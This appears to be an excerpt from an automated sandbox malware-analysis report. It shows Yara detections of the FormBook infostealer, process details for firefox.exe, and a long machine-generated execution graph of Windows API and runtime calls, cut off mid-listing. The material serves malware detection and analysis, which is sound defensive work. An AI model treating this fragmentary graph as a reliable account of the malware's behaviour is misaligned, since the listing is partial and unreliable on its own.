                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:9
                        Start time:04:08:23
                        Start date:10/10/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:0x7ff6bf500000
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:1.1%
                          Signature Coverage:3.3%
                          Total number of Nodes:1585
                          Total number of Limit Nodes:37
                          execution_graph 84503 40f110 RegOpenKeyExW 84504 40f13c RegQueryValueExW RegCloseKey 84503->84504 84505 40f15f 84503->84505 84504->84505 84506 429212 84511 410b90 84506->84511 84509 411421 __cinit 74 API calls 84510 42922f 84509->84510 84512 410b9a __write_nolock 84511->84512 84513 41171a 75 API calls 84512->84513 84514 410c31 GetModuleFileNameW 84513->84514 84528 413db0 84514->84528 84516 410c66 _wcsncat 84531 413e3c 84516->84531 84519 41171a 75 API calls 84520 410ca3 _wcscpy 84519->84520 84521 410cd1 RegOpenKeyExW 84520->84521 84522 429bc3 RegQueryValueExW 84521->84522 84523 410cf7 84521->84523 84524 429cd9 RegCloseKey 84522->84524 84526 429bf2 _wcscat _wcslen _wcsncpy 84522->84526 84523->84509 84525 41171a 75 API calls 84525->84526 84526->84525 84527 429cd8 84526->84527 84527->84524 84534 413b95 84528->84534 84564 41abec 84531->84564 84535 413c2f 84534->84535 84541 413bae 84534->84541 84536 413d60 84535->84536 84537 413d7b 84535->84537 84560 417f23 67 API calls __getptd_noexit 84536->84560 84562 417f23 67 API calls __getptd_noexit 84537->84562 84540 413d65 84545 413cfb 84540->84545 84561 417ebb 6 API calls 2 library calls 84540->84561 84541->84535 84552 413c1d 84541->84552 84556 41ab19 67 API calls __wctomb_s_l 84541->84556 84544 413d03 84544->84535 84544->84545 84547 413d8e 84544->84547 84545->84516 84546 413cb9 84546->84535 84548 413cd6 84546->84548 84558 41ab19 67 API calls __wctomb_s_l 84546->84558 84563 41ab19 67 API calls __wctomb_s_l 84547->84563 84548->84535 84548->84545 84550 413cef 84548->84550 84559 41ab19 67 API calls __wctomb_s_l 84550->84559 84552->84535 84555 413c9b 84552->84555 84557 41ab19 67 API calls __wctomb_s_l 84552->84557 84555->84544 84555->84546 84556->84552 84557->84555 84558->84548 84559->84545 84560->84540 84562->84540 84563->84545 84565 41ac02 84564->84565 84566 41abfd 84564->84566 84573 417f23 67 API calls __getptd_noexit 84565->84573 84566->84565 84572 41ac22 84566->84572 84568 41ac07 84574 417ebb 6 API calls 2 library calls 84568->84574 84571 410c99 84571->84519 84572->84571 84575 417f23 67 API calls __getptd_noexit 84572->84575 84573->84568 84575->84568 84576 401230 84577 401241 _memset 84576->84577 84578 4012c5 84576->84578 84591 401be0 84577->84591 84580 40126b 84581 4012ae KillTimer SetTimer 84580->84581 84582 42aa61 84580->84582 84583 401298 84580->84583 84581->84578 84586 42aa8b Shell_NotifyIconW 84582->84586 84587 42aa69 Shell_NotifyIconW 84582->84587 84584 4012a2 84583->84584 84585 42aaac 84583->84585 84584->84581 84588 42aaf8 Shell_NotifyIconW 84584->84588 84589 42aad7 Shell_NotifyIconW 84585->84589 84590 42aab5 Shell_NotifyIconW 84585->84590 84586->84581 84587->84581 84588->84581 84589->84581 84590->84581 84592 401bfb 84591->84592 84612 401cde 84591->84612 84613 4013a0 75 API calls 84592->84613 84594 401c0b 84595 42a9a0 LoadStringW 84594->84595 84596 401c18 84594->84596 84598 42a9bb 84595->84598 84614 4021e0 84596->84614 84627 40df50 75 API calls 84598->84627 84599 401c2d 84601 401c3a 84599->84601 84602 42a9cd 84599->84602 84601->84598 84604 401c44 84601->84604 84628 40d3b0 75 API calls 2 library calls 84602->84628 84603 401c53 _memset _wcscpy _wcsncpy 84611 401cc2 Shell_NotifyIconW 84603->84611 84626 40d3b0 75 API calls 2 library calls 84604->84626 84607 42a9dc 84607->84603 84608 42a9f0 84607->84608 84629 40d3b0 75 API calls 2 library calls 84608->84629 84610 42a9fe 84611->84612 84612->84580 84613->84594 84615 42a598 84614->84615 84617 4021f1 _wcslen 84614->84617 84632 40c740 84615->84632 84618 402205 84617->84618 84619 402226 84617->84619 84630 404020 75 API calls ctype 84618->84630 84631 401380 75 API calls 84619->84631 84621 42a5a2 84623 40222d 84623->84621 84625 41171a 75 API calls 84623->84625 84624 40220c _realloc 84624->84599 84625->84624 84626->84603 84627->84603 84628->84607 84629->84610 84630->84624 84631->84623 84633 40c752 84632->84633 84634 40c747 84632->84634 84633->84621 84634->84633 84637 402ae0 75 API calls _realloc 84634->84637 84636 42a572 _realloc 84636->84621 84637->84636 84638 4034b0 84639 4034b9 84638->84639 84640 4034bd 84638->84640 84641 41171a 75 API calls 84640->84641 84642 42a0ba 84640->84642 84643 4034fe _realloc ctype 84641->84643 83149 4161c2 83150 4161d3 83149->83150 83184 41aa31 HeapCreate 83150->83184 83153 416212 83186 416e29 GetModuleHandleW 83153->83186 83158 416223 __RTC_Initialize 83220 41b669 83158->83220 83160 416231 83161 41623d GetCommandLineW 83160->83161 83289 4117af 67 API calls 3 library calls 83160->83289 83235 42235f GetEnvironmentStringsW 83161->83235 83164 41624c 83241 4222b1 GetModuleFileNameW 83164->83241 83165 41623c 83165->83161 83167 416256 83168 416261 83167->83168 83290 4117af 67 API calls 3 library calls 83167->83290 83245 422082 83168->83245 83172 416272 83258 41186e 83172->83258 83175 416279 83177 416284 __wwincmdln 83175->83177 83292 4117af 67 API calls 3 library calls 83175->83292 83264 40d7f0 83177->83264 83180 4162b3 83294 411a4b 67 API calls _doexit 83180->83294 83183 4162b8 __setmode 83185 416206 83184->83185 83185->83153 83287 41616a 67 API calls 3 library calls 83185->83287 83187 416e44 83186->83187 83188 416e3d 83186->83188 83190 416fac 83187->83190 83191 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 83187->83191 83295 41177f Sleep GetModuleHandleW 83188->83295 83325 416ad5 70 API calls 2 library calls 83190->83325 83193 416e97 TlsAlloc 83191->83193 83192 416e43 83192->83187 83195 416218 83193->83195 83197 416ee5 TlsSetValue 83193->83197 83195->83158 83288 41616a 67 API calls 3 library calls 83195->83288 83197->83195 83198 416ef6 83197->83198 83296 411a69 6 API calls 4 library calls 83198->83296 83200 416efb 83297 41696e TlsGetValue 83200->83297 83203 41696e __encode_pointer 6 API calls 83204 416f16 83203->83204 83205 41696e __encode_pointer 6 API calls 83204->83205 83206 416f26 83205->83206 83207 41696e __encode_pointer 6 API calls 83206->83207 83208 416f36 83207->83208 83307 41828b InitializeCriticalSectionAndSpinCount __getstream 83208->83307 83210 416f43 83210->83190 83308 4169e9 TlsGetValue 83210->83308 83215 4169e9 __decode_pointer 6 API calls 83216 416f8a 83215->83216 83216->83190 83217 416f91 83216->83217 83324 416b12 67 API calls 5 library calls 83217->83324 83219 416f99 GetCurrentThreadId 83219->83195 83438 41718c 83220->83438 83222 41b675 GetStartupInfoA 83223 416ffb __calloc_crt 67 API calls 83222->83223 83230 41b696 83223->83230 83224 41b8b4 __setmode 83224->83160 83225 41b831 GetStdHandle 83229 41b7fb 83225->83229 83226 416ffb __calloc_crt 67 API calls 83226->83230 83227 41b896 SetHandleCount 83227->83224 83228 41b843 GetFileType 83228->83229 83229->83224 83229->83225 83229->83227 83229->83228 83440 4189e6 InitializeCriticalSectionAndSpinCount __setmode 83229->83440 83230->83224 83230->83226 83230->83229 83231 41b77e 83230->83231 83231->83224 83231->83229 83232 41b7a7 GetFileType 83231->83232 83439 4189e6 InitializeCriticalSectionAndSpinCount __setmode 83231->83439 83232->83231 83236 422370 83235->83236 83237 422374 83235->83237 83236->83164 83237->83237 83238 416fb6 __malloc_crt 67 API calls 83237->83238 83239 422395 _realloc 83238->83239 83240 42239c FreeEnvironmentStringsW 83239->83240 83240->83164 83242 4222e6 _wparse_cmdline 83241->83242 83243 416fb6 __malloc_crt 67 API calls 83242->83243 83244 422329 _wparse_cmdline 83242->83244 83243->83244 83244->83167 83246 42209a _wcslen 83245->83246 83250 416267 83245->83250 83247 416ffb __calloc_crt 67 API calls 83246->83247 83253 4220be _wcslen 83247->83253 83248 422123 83249 413a88 __freebuf 67 API calls 83248->83249 83249->83250 83250->83172 83291 4117af 67 API calls 3 library calls 83250->83291 83251 416ffb __calloc_crt 67 API calls 83251->83253 83252 422149 83254 413a88 __freebuf 67 API calls 83252->83254 83253->83248 83253->83250 83253->83251 83253->83252 83256 422108 83253->83256 83441 426349 67 API calls __wctomb_s_l 83253->83441 83254->83250 83256->83253 83442 417d93 10 API calls 3 library calls 83256->83442 83260 41187c __IsNonwritableInCurrentImage 83258->83260 83443 418486 83260->83443 83261 41189a __initterm_e 83263 4118b9 __IsNonwritableInCurrentImage __initterm 83261->83263 83447 411421 83261->83447 83263->83175 83265 431bcb 83264->83265 83266 40d80c 83264->83266 83491 4092c0 83266->83491 83268 40d847 83495 40eb50 83268->83495 83271 40d877 83498 411ac6 67 API calls 4 library calls 83271->83498 83274 40d888 83499 411b24 67 API calls __wctomb_s_l 83274->83499 83276 40d891 83500 40f370 SystemParametersInfoW SystemParametersInfoW 83276->83500 83278 40d89f 83501 40d6d0 GetCurrentDirectoryW 83278->83501 83280 40d8a7 SystemParametersInfoW 83281 40d8d4 83280->83281 83282 40d8cd FreeLibrary 83280->83282 83283 4092c0 VariantClear 83281->83283 83282->83281 83284 40d8dd 83283->83284 83285 4092c0 VariantClear 83284->83285 83286 40d8e6 83285->83286 83286->83180 83293 411a1f 67 API calls _doexit 83286->83293 83287->83153 83288->83158 83289->83165 83290->83168 83291->83172 83292->83177 83293->83180 83294->83183 83295->83192 83296->83200 83298 4169a7 GetModuleHandleW 83297->83298 83299 416986 83297->83299 83301 4169c2 GetProcAddress 83298->83301 83302 4169b7 83298->83302 83299->83298 83300 416990 TlsGetValue 83299->83300 83304 41699b 83300->83304 83306 41699f 83301->83306 83326 41177f Sleep GetModuleHandleW 83302->83326 83304->83298 83304->83306 83305 4169bd 83305->83301 83305->83306 83306->83203 83307->83210 83309 416a01 83308->83309 83310 416a22 GetModuleHandleW 83308->83310 83309->83310 83313 416a0b TlsGetValue 83309->83313 83311 416a32 83310->83311 83312 416a3d GetProcAddress 83310->83312 83327 41177f Sleep GetModuleHandleW 83311->83327 83315 416a1a 83312->83315 83317 416a16 83313->83317 83315->83190 83318 416ffb 83315->83318 83316 416a38 83316->83312 83316->83315 83317->83310 83317->83315 83320 417004 83318->83320 83321 416f70 83320->83321 83322 417022 Sleep 83320->83322 83328 422452 83320->83328 83321->83190 83321->83215 83323 417037 83322->83323 83323->83320 83323->83321 83324->83219 83325->83195 83326->83305 83327->83316 83329 42245e __setmode 83328->83329 83330 422476 83329->83330 83334 422495 _memset 83329->83334 83341 417f23 67 API calls __getptd_noexit 83330->83341 83332 42247b 83342 417ebb 6 API calls 2 library calls 83332->83342 83333 422507 HeapAlloc 83333->83334 83334->83333 83338 42248b __setmode 83334->83338 83343 418407 83334->83343 83350 41a74c 5 API calls 2 library calls 83334->83350 83351 42254e LeaveCriticalSection _doexit 83334->83351 83352 411afc 6 API calls __decode_pointer 83334->83352 83338->83320 83341->83332 83344 41841c 83343->83344 83345 41842f EnterCriticalSection 83343->83345 83353 418344 83344->83353 83345->83334 83347 418422 83347->83345 83381 4117af 67 API calls 3 library calls 83347->83381 83349 41842e 83349->83345 83350->83334 83351->83334 83352->83334 83354 418350 __setmode 83353->83354 83355 418360 83354->83355 83356 418378 83354->83356 83382 418252 67 API calls 2 library calls 83355->83382 83362 418386 __setmode 83356->83362 83385 416fb6 83356->83385 83358 418365 83383 4180a7 67 API calls 7 library calls 83358->83383 83362->83347 83363 41836c 83384 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83363->83384 83364 4183a7 83366 418407 __lock 67 API calls 83364->83366 83365 418398 83391 417f23 67 API calls __getptd_noexit 83365->83391 83369 4183ae 83366->83369 83371 4183e2 83369->83371 83372 4183b6 83369->83372 83374 413a88 __freebuf 67 API calls 83371->83374 83392 4189e6 InitializeCriticalSectionAndSpinCount __setmode 83372->83392 83376 4183d3 83374->83376 83375 4183c1 83375->83376 83393 413a88 83375->83393 83407 4183fe LeaveCriticalSection _doexit 83376->83407 83379 4183cd 83406 417f23 67 API calls __getptd_noexit 83379->83406 83381->83349 83382->83358 83383->83363 83388 416fbf 83385->83388 83387 416ff5 83387->83364 83387->83365 83388->83387 83389 416fd6 Sleep 83388->83389 83408 4138ba 83388->83408 83390 416feb 83389->83390 83390->83387 83390->83388 83391->83362 83392->83375 83394 413a94 __setmode 83393->83394 83395 413ad3 83394->83395 83397 418407 __lock 65 API calls 83394->83397 83398 413b0d _realloc __setmode 83394->83398 83396 413ae8 RtlFreeHeap 83395->83396 83395->83398 83396->83398 83399 413afa 83396->83399 83400 413aab ___sbh_find_block 83397->83400 83398->83379 83437 417f23 67 API calls __getptd_noexit 83399->83437 83403 413ac5 83400->83403 83435 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __shift 83400->83435 83402 413aff GetLastError 83402->83398 83436 413ade LeaveCriticalSection _doexit 83403->83436 83406->83376 83407->83362 83409 41396d 83408->83409 83419 4138cc 83408->83419 83433 411afc 6 API calls __decode_pointer 83409->83433 83411 413973 83434 417f23 67 API calls __getptd_noexit 83411->83434 83416 413929 RtlAllocateHeap 83416->83419 83417 4138dd 83417->83419 83426 418252 67 API calls 2 library calls 83417->83426 83427 4180a7 67 API calls 7 library calls 83417->83427 83428 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83417->83428 83419->83416 83419->83417 83420 413959 83419->83420 83423 41395e 83419->83423 83425 413965 83419->83425 83429 41386b 67 API calls 4 library calls 83419->83429 83430 411afc 6 API calls __decode_pointer 83419->83430 83431 417f23 67 API calls __getptd_noexit 83420->83431 83432 417f23 67 API calls __getptd_noexit 83423->83432 83425->83388 83426->83417 83427->83417 83429->83419 83430->83419 83431->83423 83432->83425 83433->83411 83434->83425 83435->83403 83436->83395 83437->83402 83438->83222 83439->83231 83440->83229 83441->83253 83442->83256 83444 41848c 83443->83444 83445 41696e __encode_pointer 6 API calls 83444->83445 83446 4184a4 83444->83446 83445->83444 83446->83261 83450 4113e5 83447->83450 83449 41142e 83449->83263 83451 4113f1 __setmode 83450->83451 83458 41181b 83451->83458 83457 411412 __setmode 83457->83449 83459 418407 __lock 67 API calls 83458->83459 83460 4113f6 83459->83460 83461 4112fa 83460->83461 83462 4169e9 __decode_pointer 6 API calls 83461->83462 83463 41130e 83462->83463 83464 4169e9 __decode_pointer 6 API calls 83463->83464 83465 41131e 83464->83465 83476 4113a1 83465->83476 83484 4170e7 68 API calls 5 library calls 83465->83484 83467 41133c 83468 411388 83467->83468 83471 411357 83467->83471 83472 411366 83467->83472 83469 41696e __encode_pointer 6 API calls 83468->83469 83470 411396 83469->83470 83473 41696e __encode_pointer 6 API calls 83470->83473 83485 417047 73 API calls _realloc 83471->83485 83475 411360 83472->83475 83472->83476 83473->83476 83475->83472 83478 41137c 83475->83478 83486 417047 73 API calls _realloc 83475->83486 83481 41141b 83476->83481 83480 41696e __encode_pointer 6 API calls 83478->83480 83479 411376 83479->83476 83479->83478 83480->83468 83487 411824 83481->83487 83484->83467 83485->83475 83486->83479 83490 41832d LeaveCriticalSection 83487->83490 83489 411420 83489->83457 83490->83489 83492 4092c8 ctype 83491->83492 83493 429db0 VariantClear 83492->83493 83494 4092d5 ctype 83492->83494 83493->83494 83494->83268 83539 40eb70 83495->83539 83498->83274 83499->83276 83500->83278 83543 401f80 83501->83543 83503 40d6f1 IsDebuggerPresent 83504 431a9d MessageBoxA 83503->83504 83505 40d6ff 83503->83505 83506 431ab6 83504->83506 83505->83506 83507 40d71f 83505->83507 83636 403e90 75 API calls 3 library calls 83506->83636 83613 40f3b0 83507->83613 83511 40d73a GetFullPathNameW 83633 401440 127 API calls _wcscat 83511->83633 83513 40d77a 83514 40d782 83513->83514 83515 431b09 SetCurrentDirectoryW 83513->83515 83516 40d78b 83514->83516 83637 43604b 6 API calls 83514->83637 83515->83514 83625 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 83516->83625 83519 431b28 83519->83516 83521 431b30 GetModuleFileNameW 83519->83521 83523 431ba4 GetForegroundWindow ShellExecuteW 83521->83523 83524 431b4c 83521->83524 83526 40d7c7 83523->83526 83638 401b70 75 API calls 2 library calls 83524->83638 83525 40d795 83532 40d7a8 83525->83532 83634 40e1e0 97 API calls _memset 83525->83634 83530 40d7d1 SetCurrentDirectoryW 83526->83530 83528 431b5a 83639 40d3b0 75 API calls 2 library calls 83528->83639 83530->83280 83532->83526 83635 401000 Shell_NotifyIconW _memset 83532->83635 83533 431b66 83640 40d3b0 75 API calls 2 library calls 83533->83640 83536 431b72 GetForegroundWindow ShellExecuteW 83537 431b9f 83536->83537 83537->83526 83538 40eba0 LoadLibraryA GetProcAddress 83538->83271 83540 40d86e 83539->83540 83541 40eb76 LoadLibraryA 83539->83541 83540->83271 83540->83538 83541->83540 83542 40eb87 GetProcAddress 83541->83542 83542->83540 83641 40e680 75 API calls 83543->83641 83545 401f90 83642 402940 75 API calls __write_nolock 83545->83642 83547 401fa2 GetModuleFileNameW 83643 40ff90 83547->83643 83549 401fbd 83655 4107b0 75 API calls 83549->83655 83551 401fd6 83656 401b70 75 API calls 2 library calls 83551->83656 83553 401fe4 83657 4019e0 76 API calls 83553->83657 83555 401ff2 83556 4092c0 VariantClear 83555->83556 83557 402002 83556->83557 83658 401b70 75 API calls 2 library calls 83557->83658 83559 40201c 83659 4019e0 76 API calls 83559->83659 83561 40202c 83660 401b70 75 API calls 2 library calls 83561->83660 83563 40203c 83661 40c3e0 75 API calls 83563->83661 83565 40204d 83662 40c060 83565->83662 83569 40206e 83668 4115d0 79 API calls 2 library calls 83569->83668 83571 40207d 83572 42c174 83571->83572 83573 402088 83571->83573 83679 401a70 75 API calls 83572->83679 83669 4115d0 79 API calls 2 library calls 83573->83669 83576 42c189 83680 401a70 75 API calls 83576->83680 83577 402093 83577->83576 83578 40209e 83577->83578 83670 4115d0 79 API calls 2 library calls 83578->83670 83581 42c1a7 83583 42c1b0 GetModuleFileNameW 83581->83583 83582 4020a9 83582->83583 83584 4020b4 83582->83584 83681 401a70 75 API calls 83583->83681 83671 4115d0 79 API calls 2 library calls 83584->83671 83587 4020bf 83596 42c20a _wcscpy 83587->83596 83605 402107 83587->83605 83672 401a70 75 API calls 83587->83672 83588 42c1e2 83682 40df50 75 API calls 83588->83682 83590 42c1f1 83683 401a70 75 API calls 83590->83683 83591 402119 83594 42c243 83591->83594 83674 40e7e0 76 API calls 83591->83674 83595 42c201 83595->83596 83684 401a70 75 API calls 83596->83684 83599 402132 83675 40d030 76 API calls 83599->83675 83601 4020e5 _wcscpy 83673 401a70 75 API calls 83601->83673 83602 40213e 83604 4092c0 VariantClear 83602->83604 83608 402148 83604->83608 83605->83591 83605->83596 83606 402184 83610 4092c0 VariantClear 83606->83610 83608->83606 83676 40d030 76 API calls 83608->83676 83677 40e640 76 API calls 83608->83677 83678 401a70 75 API calls 83608->83678 83612 402196 ctype 83610->83612 83612->83503 83614 42ccf4 _memset 83613->83614 83615 40f3c9 83613->83615 83617 42cd05 GetOpenFileNameW 83614->83617 84359 40ffb0 76 API calls ctype 83615->84359 83617->83615 83619 40d732 83617->83619 83618 40f3d2 84360 410130 SHGetMalloc 83618->84360 83619->83511 83619->83513 83621 40f3d9 84365 410020 88 API calls __wcsicoll 83621->84365 83623 40f3e7 84366 40f400 83623->84366 83626 42b9d3 83625->83626 83627 41025a LoadImageW RegisterClassExW 83625->83627 84420 443e8f EnumResourceNamesW LoadImageW 83626->84420 84419 4102f0 7 API calls 83627->84419 83630 42b9da 83631 40d790 83632 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 83631->83632 83632->83525 83633->83513 83634->83532 83635->83526 83636->83513 83637->83519 83638->83528 83639->83533 83640->83536 83641->83545 83642->83547 83685 40f5e0 83643->83685 83646 40ffa6 83646->83549 83648 42b6d8 83649 42b6e6 83648->83649 83741 434fe1 83648->83741 83651 413a88 __freebuf 67 API calls 83649->83651 83652 42b6f5 83651->83652 83653 434fe1 106 API calls 83652->83653 83654 42b702 83653->83654 83654->83549 83655->83551 83656->83553 83657->83555 83658->83559 83659->83561 83660->83563 83661->83565 83663 41171a 75 API calls 83662->83663 83664 40c088 83663->83664 83665 41171a 75 API calls 83664->83665 83666 402061 83665->83666 83667 401a70 75 API calls 83666->83667 83667->83569 83668->83571 83669->83577 83670->83582 83671->83587 83672->83601 83673->83605 83674->83599 83675->83602 83676->83608 83677->83608 83678->83608 83679->83576 83680->83581 83681->83588 83682->83590 83683->83595 83684->83608 83745 40f580 83685->83745 83687 40f5f8 _strcat ctype 83753 40f6d0 83687->83753 83692 42b2ee 83782 4151b0 83692->83782 83694 40f679 83694->83692 83696 40f681 83694->83696 83769 414e94 83696->83769 83700 40f68b 83700->83646 83704 452574 83700->83704 83701 42b31d 83701->83701 83788 415484 83701->83788 83703 42b33d 83705 41557c _fseek 105 API calls 83704->83705 83706 4525df 83705->83706 84304 4523ce 83706->84304 83709 4525fc 83709->83648 83710 4151b0 __fread_nolock 81 API calls 83711 45261d 83710->83711 83712 4151b0 __fread_nolock 81 API calls 83711->83712 83713 45262e 83712->83713 83714 4151b0 __fread_nolock 81 API calls 83713->83714 83715 452649 83714->83715 83716 4151b0 __fread_nolock 81 API calls 83715->83716 83717 452666 83716->83717 83718 41557c _fseek 105 API calls 83717->83718 83719 452682 83718->83719 83720 4138ba _malloc 67 API calls 83719->83720 83721 45268e 83720->83721 83722 4138ba _malloc 67 API calls 83721->83722 83723 45269b 83722->83723 83724 4151b0 __fread_nolock 81 API calls 83723->83724 83725 4526ac 83724->83725 83726 44afdc GetSystemTimeAsFileTime 83725->83726 83727 4526bf 83726->83727 83728 4526d5 83727->83728 83729 4526fd 83727->83729 83730 413a88 __freebuf 67 API calls 83728->83730 83731 452704 83729->83731 83732 45275b 83729->83732 83733 4526df 83730->83733 84310 44b195 83731->84310 83735 413a88 __freebuf 67 API calls 83732->83735 83737 413a88 __freebuf 67 API calls 83733->83737 83736 452759 83735->83736 83736->83648 83739 4526e8 83737->83739 83738 452753 83740 413a88 __freebuf 67 API calls 83738->83740 83739->83648 83740->83736 83742 434ff1 83741->83742 83743 434feb 83741->83743 83742->83649 83744 414e94 __fcloseall 106 API calls 83743->83744 83744->83742 83746 429440 83745->83746 83747 40f589 _wcslen 83745->83747 83748 40f58f WideCharToMultiByte 83747->83748 83749 40f5d8 83748->83749 83750 40f5ad 83748->83750 83749->83687 83801 41171a 83750->83801 83754 40f6dd _strlen 83753->83754 83816 40f790 83754->83816 83757 414e06 83835 414d40 83757->83835 83759 40f666 83759->83692 83760 40f450 83759->83760 83764 40f45a _strcat _realloc __write_nolock 83760->83764 83761 4151b0 __fread_nolock 81 API calls 83761->83764 83763 42936d 83765 41557c _fseek 105 API calls 83763->83765 83764->83761 83764->83763 83768 40f531 83764->83768 83918 41557c 83764->83918 83766 429394 83765->83766 83767 4151b0 __fread_nolock 81 API calls 83766->83767 83767->83768 83768->83694 83770 414ea0 __setmode 83769->83770 83771 414ed1 83770->83771 83772 414eb4 83770->83772 83774 415965 __lock_file 68 API calls 83771->83774 83777 414ec9 __setmode 83771->83777 84057 417f23 67 API calls __getptd_noexit 83772->84057 83778 414ee9 83774->83778 83775 414eb9 84058 417ebb 6 API calls 2 library calls 83775->84058 83777->83700 84041 414e1d 83778->84041 84126 41511a 83782->84126 83784 4151c8 83785 44afdc 83784->83785 84297 4431e0 83785->84297 83787 44affd 83787->83701 83789 415490 __setmode 83788->83789 83790 4154bb 83789->83790 83791 41549e 83789->83791 83793 415965 __lock_file 68 API calls 83790->83793 84301 417f23 67 API calls __getptd_noexit 83791->84301 83795 4154c3 83793->83795 83794 4154a3 84302 417ebb 6 API calls 2 library calls 83794->84302 83797 4152e7 __ftell_nolock 71 API calls 83795->83797 83798 4154cf 83797->83798 84303 4154e8 LeaveCriticalSection LeaveCriticalSection _fprintf 83798->84303 83799 4154b3 __setmode 83799->83703 83803 411724 83801->83803 83802 4138ba _malloc 67 API calls 83802->83803 83803->83802 83804 40f5bb WideCharToMultiByte 83803->83804 83809 411740 std::bad_alloc::bad_alloc 83803->83809 83813 411afc 6 API calls __decode_pointer 83803->83813 83804->83687 83806 411766 83814 4116fd 67 API calls std::exception::exception 83806->83814 83808 411770 83815 41805b RaiseException 83808->83815 83809->83806 83811 411421 __cinit 74 API calls 83809->83811 83811->83806 83812 41177e 83813->83803 83814->83808 83815->83812 83818 40f7ae _memset 83816->83818 83819 40f628 83818->83819 83820 415258 83818->83820 83819->83757 83821 415285 83820->83821 83822 415268 83820->83822 83821->83822 83824 41528c 83821->83824 83831 417f23 67 API calls __getptd_noexit 83822->83831 83833 41c551 103 API calls 14 library calls 83824->83833 83825 41526d 83832 417ebb 6 API calls 2 library calls 83825->83832 83828 4152b2 83829 41527d 83828->83829 83834 4191c9 101 API calls 6 library calls 83828->83834 83829->83818 83831->83825 83833->83828 83834->83829 83836 414d4c __setmode 83835->83836 83837 414d5f 83836->83837 83839 414d95 83836->83839 83887 417f23 67 API calls __getptd_noexit 83837->83887 83854 41e28c 83839->83854 83840 414d64 83888 417ebb 6 API calls 2 library calls 83840->83888 83843 414d9a 83844 414da1 83843->83844 83845 414dae 83843->83845 83889 417f23 67 API calls __getptd_noexit 83844->83889 83847 414dd6 83845->83847 83848 414db6 83845->83848 83872 41dfd8 83847->83872 83890 417f23 67 API calls __getptd_noexit 83848->83890 83852 414d74 @_EH4_CallFilterFunc@8 __setmode 83852->83759 83855 41e298 __setmode 83854->83855 83856 418407 __lock 67 API calls 83855->83856 83869 41e2a6 83856->83869 83857 41e31b 83892 41e3bb 83857->83892 83858 41e322 83860 416fb6 __malloc_crt 67 API calls 83858->83860 83862 41e32c 83860->83862 83861 41e3b0 __setmode 83861->83843 83862->83857 83897 4189e6 InitializeCriticalSectionAndSpinCount __setmode 83862->83897 83864 418344 __mtinitlocknum 67 API calls 83864->83869 83866 41e351 83867 41e35c 83866->83867 83868 41e36f EnterCriticalSection 83866->83868 83871 413a88 __freebuf 67 API calls 83867->83871 83868->83857 83869->83857 83869->83858 83869->83864 83895 4159a6 68 API calls __lock 83869->83895 83896 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 83869->83896 83871->83857 83880 41dffb __wopenfile 83872->83880 83873 41e015 83902 417f23 67 API calls __getptd_noexit 83873->83902 83874 41e1e9 83874->83873 83877 41e247 83874->83877 83876 41e01a 83903 417ebb 6 API calls 2 library calls 83876->83903 83899 425db0 83877->83899 83880->83873 83880->83874 83904 4136bc 79 API calls 2 library calls 83880->83904 83883 41e1e2 83883->83874 83905 4136bc 79 API calls 2 library calls 83883->83905 83885 41e201 83885->83874 83906 4136bc 79 API calls 2 library calls 83885->83906 83887->83840 83889->83852 83890->83852 83891 414dfc LeaveCriticalSection LeaveCriticalSection _fprintf 83891->83852 83898 41832d LeaveCriticalSection 83892->83898 83894 41e3c2 83894->83861 83895->83869 83896->83869 83897->83866 83898->83894 83907 425ce4 83899->83907 83901 414de1 83901->83891 83902->83876 83904->83883 83905->83885 83906->83874 83910 425cf0 __setmode 83907->83910 83908 425d03 83909 417f23 __wctomb_s_l 67 API calls 83908->83909 83911 425d08 83909->83911 83910->83908 83912 425d41 83910->83912 83914 417ebb __wctomb_s_l 6 API calls 83911->83914 83913 4255c4 __tsopen_nolock 132 API calls 83912->83913 83915 425d5b 83913->83915 83917 425d17 __setmode 83914->83917 83916 425d82 __sopen_helper LeaveCriticalSection 83915->83916 83916->83917 83917->83901 83922 415588 __setmode 83918->83922 83919 415596 83949 417f23 67 API calls __getptd_noexit 83919->83949 83921 4155c4 83931 415965 83921->83931 83922->83919 83922->83921 83923 41559b 83950 417ebb 6 API calls 2 library calls 83923->83950 83930 4155ab __setmode 83930->83764 83932 415977 83931->83932 83933 415999 EnterCriticalSection 83931->83933 83932->83933 83934 41597f 83932->83934 83935 4155cc 83933->83935 83936 418407 __lock 67 API calls 83934->83936 83937 4154f2 83935->83937 83936->83935 83938 415512 83937->83938 83939 415502 83937->83939 83944 415524 83938->83944 83952 4152e7 83938->83952 84006 417f23 67 API calls __getptd_noexit 83939->84006 83941 415507 83951 4155f7 LeaveCriticalSection LeaveCriticalSection _fprintf 83941->83951 83969 41486c 83944->83969 83949->83923 83951->83930 83953 41531a 83952->83953 83954 4152fa 83952->83954 83955 41453a __fileno 67 API calls 83953->83955 84007 417f23 67 API calls __getptd_noexit 83954->84007 83958 415320 83955->83958 83957 4152ff 84008 417ebb 6 API calls 2 library calls 83957->84008 83960 41efd4 __locking 71 API calls 83958->83960 83961 415335 83960->83961 83962 4153a9 83961->83962 83964 415364 83961->83964 83968 41530f 83961->83968 84009 417f23 67 API calls __getptd_noexit 83962->84009 83965 41efd4 __locking 71 API calls 83964->83965 83964->83968 83966 415404 83965->83966 83967 41efd4 __locking 71 API calls 83966->83967 83966->83968 83967->83968 83968->83944 83970 4148a7 